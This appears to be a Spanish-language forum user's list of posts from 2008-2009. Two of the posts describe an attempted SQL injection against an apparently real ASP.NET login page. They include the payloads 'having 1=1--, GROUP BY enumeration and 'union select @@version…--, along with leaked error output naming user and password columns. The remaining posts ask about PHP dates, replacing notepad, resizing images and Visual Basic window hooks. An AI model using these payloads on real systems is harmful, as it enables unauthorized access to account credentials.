|
Mostrar Mensajes
|
Páginas: [1] 2 3
|
1
|
Seguridad Informática / Nivel Web / Re: inyeccion sql?????
|
en: 4 Julio 2009, 23:26 pm
|
bueno mi conocimiento es bien basico sobre sql, asi que disculpen algunos errores que pueda tener en mi explicacion. en primer lugar la pagina esta desarrollada en asp.net bajo un IIS 6.0 una pagina de login con un simple formulario de login a password ok. asi que no se si puediera introducir los datos desde la barra de dirrecciones como he visto muchos ejemplos, al moverse sobre esta pagina no muestra ninguna variacion en la barra de direcciones osea como ejemplo: index.php?id=0 todo trabaja bajo el modo POST. se que es vulnerable por que al introducir una simple comilla en el login me sale lo siguiente:
logear c:\xxx\usuario.prg Error en la línea 197 Código de excepción OLE IDispatch 0 de Microsoft OLE DB Provider for SQL Server: Comilla no cerrada antes de la cadena de caracteres '' and usr_status = 1'.. 1429
con un 'having 1=1-- en el username me devuelve el nombre de un campo que son los siguientes usando despues el 'group by sucesivamente
.logear c:\xxx\usuario.prg Error en la línea 197 Código de excepción OLE IDispatch 0 de Microsoft OLE DB Provider for SQL Server: La columna 'usuarios.agd_codigo' de la lista de selección no es válida, porque no está contenida en una función de agregado y no hay cláusula GROUP BY.. 1429
.logear c:\xxx\usuario.prg Error en la línea 197 Código de excepción OLE IDispatch 0 de Microsoft OLE DB Provider for SQL Server: La columna 'usuarios.usr_login' de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.. 1429
.logear c:\xxx\usuario.prg Error en la línea 197 Código de excepción OLE IDispatch 0 de Microsoft OLE DB Provider for SQL Server: La columna 'usuarios.usr_clave' de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.. 1429
.logear c:\xxx\usuario.prg Error en la línea 197 Código de excepción OLE IDispatch 0 de Microsoft OLE DB Provider for SQL Server: La columna 'usuarios.usr_status' de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.. 1429
.logear c:\xxx\usuario.prg Error en la línea 197 Código de excepción OLE IDispatch 0 de Microsoft OLE DB Provider for SQL Server: La columna 'usuarios.nvl_codigo' de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.. 1429
.logear c:\xxx\usuario.prg Error en la línea 197 Código de excepción OLE IDispatch 0 de Microsoft OLE DB Provider for SQL Server: La columna 'usuarios.usr_codigo' de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.. 1429
.logear c:\xxx\usuario.prg Error en la línea 197 Código de excepción OLE IDispatch 0 de Microsoft OLE DB Provider for SQL Server: La columna 'usuarios.usr_descripcion' de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.. 1429
despues de todo esto me devuelve un error esto debe ser por es el ultimo campo no??
ahora donde me he quedado barado ha sido en el famoso. 'union select @@version,1,1,1,1,1,1 -- que deberia ser 7 no???? gracias.
|
|
|
2
|
Seguridad Informática / Nivel Web / inyeccion sql?????
|
en: 3 Julio 2009, 21:05 pm
|
tengo un problema al intentar una inyeccion sql tengo los nombres de las tablas pero estoy barado en lo siguiente.
'union select @@version --
y me manda lo siguiente: "All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists", entonces lo que prosigue por supuesto es igualar el numero de expresiones que solicita, y voy agregando uno por uno hasta llegar al indicado:
'union select @@version,1,1,1,1,1,1 --
igual me dice que necesito igual el numero de expresiones pero ya he intentado con demasiados 1 jejejej y la verdad no se que hacer, hubiese algun otro metodo de obtener esa info ok gracias.
ahhh es por fines educativos por supuesto...
|
|
|
3
|
Programación / PHP / problema funcion date???
|
en: 5 Mayo 2009, 02:09 am
|
al tratar de imprimir sobre el navegador la fecha me sale el siguiente error he buscado info al respecto y me sugieren que debo editar el php.ini he introducir el pais en mi caso es bolivia. pero igual no me funciona...
el error es este:
Strict Standards: date() [function.date]: It is not safe to rely on the system's timezone settings. Please use the date.timezone setting, the TZ environment variable or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected 'America/Halifax' for '-4.0/no DST' instead in C:\AppServ\www\orden.php on line 12 4th May,21:59
la version del appserv que estoy usando es:
AppServ 2.6.0 -Apache 2.2.8 -PHP 6.0.0-dev -MySQL 6.0.4-alpha -phpMyAdmin-2.10.3
|
|
|
4
|
Programación / Programación Visual Basic / reemplazar procesos??
|
en: 5 Marzo 2009, 05:00 am
|
hola amigos haber si alguno de ustedes me pudiese dar una ayudita estoy con un problemita es que tengo una tarea de programacion la cual me pidieron programar un editor de texto como el notepad y ademas de esto pudiese reemplazarlo ya lo he programado pero lo que no puedo hacer es reemplazarlo ya que hay un proceso el winlogon.exe que no me lo permite cada ves que lo sobreescribo me devuelve el fichero original..
|
|
|
6
|
Programación / Programación Visual Basic / Redimensionar imagen????
|
en: 19 Septiembre 2008, 23:01 pm
|
Hola q tal amigos de este foro, bueno tengo un pequeño problema con el manejo de imagenes en vb, lo que quiero hacer es que mediante un picture box cargar una imagen pero es muy grande asi que quisiera redimensionarla para poder enviarla por correo.
|
|
|
7
|
Programación / Programación Visual Basic / global hooks??????
|
en: 30 Mayo 2008, 18:03 pm
|
pues amigos sigo con el problema que me ha dado dolores de cabeza esto de los hooks aqui un nuevo code que todavia no puedo hacer que funcione. 'form Private Sub Command1_Click() Hook End Sub
Private Sub Form_Unload(Cancel As Integer) NonHook End Sub
'module Option Explicit Declare Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" _ (ByVal idHook As Long, _ ByVal lpfn As Long, _ ByVal hmod As Long, _ ByVal dwThreadId As Long) As Long Declare Function UnhookWindowsHookEx Lib "user32" _ (ByVal hHook As Long) As Long
Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" _ (ByVal lpLibFileName As String) As Long
Declare Function GetProcAddress Lib "kernel32" _ (ByVal hModule As Long, ByVal lpProcName As String) As Long Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As Long Public Const WH_CBT = 5 Public Const WH_SHELL As Long = 10 Public hHook As Long
Public Sub Hook() Dim hHookDLL As Long Dim pHookFunction As Long hHookDLL = LoadLibrary("hk.dll") If hHookDLL = 0 Then End End If pHookFunction = GetProcAddress(hHookDLL, "HookFunction") hHook = SetWindowsHookEx(WH_CBT, pHookFunction, hHookDLL, 0) FreeLibrary (hHookDLL) End Sub
Public Sub NonHook() Dim suc As Long If hHook <> 0 Then suc = UnhookWindowsHookEx(hHook) hHook = 0 End If
End Sub
'dll Private Declare Function CallNextHookEx Lib "user32" _ (ByVal hHook As Long, _ ByVal ncode As Long, _ ByVal wParam As Long, _ lParam As Any) As Long Private Const HCBT_ACTIVATE = 1 Private Const HCBT_DESTROYWND As Long = 1 Private Declare Function GetForegroundWindow Lib "user32" () As Long Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long Private Const HC_ACTION As Long = 0 Private Const HCBT_CREATEWND As Long = 3 Private Const WH_SHELL As Long = 10 Private Const HSHELL_WINDOWCREATED& = 1 Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long Public Type CWPSTRUCT lParam As Long wParam As Long message As Long hwnd As Long End Type Private Const WM_CREATE As Long = &H1
Public Function HookFunction(ByVal iCode As Long, ByVal wParam As Long, lParam As CWPSTRUCT) As Long
Dim FrmHandle As Long, lcaption As String
If iCode < 0 Then HookFunction = CallNextHookEx(hHook, iCode, wParam, ByVal lParam) Exit Function End If Dim Class As String, cl As Long Class = Space(64) cl = GetClassName(lParam.hwnd, Class, 64) If StrComp(Class, "MSBLWindowClass") = 0 Then MsgBox ("siii") End If HookFunction = CallNextHookEx(hHook, iCode, wParam, ByVal lParam) End Function
|
|
|
|
|
|
|